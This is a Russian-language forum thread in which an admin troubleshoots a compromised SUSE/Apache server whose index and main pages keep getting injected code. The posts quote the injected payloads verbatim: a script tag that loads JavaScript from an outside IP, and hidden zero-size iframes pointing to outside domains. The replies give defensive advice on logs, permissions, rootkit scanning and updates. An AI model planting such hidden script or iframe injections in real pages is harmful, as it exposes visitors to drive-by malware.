Стоит инет-сервак под Suse Linux Enterprice с апачем, как водится. Так вот, повелась там какая-то зараза вредная. Пишет свой ява-код вида
<script language="JavaScript" src="http://195.189.227.58/top100_00.js"></script>
и прочее, вплоть до процедур на ява-скрипте в вайлы сайтов, лежащих в /srv/www, причем разборчиво: только в страницы с содержанием в имени слов main или index.
что это может быть, куда копать?
На сервере еще есть папка для фтп-закачек, там полно, конечно, вирусни, но она виндовая :)

Смотрите логи апача, кто там с этого адреса к вам лазает. Самое простое - заблокировать его.
Ну, а по большому счету нужно проверять ваш код и права доступа к содержимому. Заодно и ftp проверьте, не дает ли он легкий доступ к содержимому вашего www.

извиняюсь за долгое пропадание :)
вот проблема снова проявилась, и есть чего показать.
<iframe src="http://ruoo.info" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://klinoneshoes.info" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://165.194.30.123/qwerty/1/index.php" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://bananm.net" width=0 height=0 frameborder=0></iframe>
выглядит оно примерно таким образом (я имею в виду зараза). Провелир логи - нет запросов с этих адресов.
Самое занятное, что писать в этот файл (index.php, в нем было найдено) может только root. Пароль не элементарный, менял.

Surround
а обновленным clamav не пробывали просканить весь /

Попробуйте задать вопрос в разделе Информационная безопасность (http://forum.oszone.net/forum-86.html). Если не помогут, то рекомендую обратиться на форум разработчиков антивирусных программ, например, Dr. Web или Касперского. У них больше опыта :)

Surround, какая версия Апача? Быть может он подвергается атаке и повышает свои права до уровня системы? Хотя не должен. Надо подумать, как это происходит, но ответ пока прежний - установить акутальные обновления.

ну проблема не в вирусе - тут никаких следов пребывания нет, а во взломе Вашего сервера. Надо очень внимательно проверять измененнные файлы (и по времени, и по размеру). И все возможные логи.
Что значит в index.php может писать только root?? Вы пускаете его по ftp? Или редактируете файлы только по ssh?

Что значит в index.php может писать только root?? »
в том плане, что chmod стоит 755.
попробую посканить

Проверьте с помощью http://www.chkrootkit.org/,

Интересно, вы пускаете свой веб сервер под рутом? или под системным юзером www? Используйте для веб сервера chroot.

Установи пакет seccheck (http://www.novell.com/products/linuxpackages/server11/i386/seccheck.html).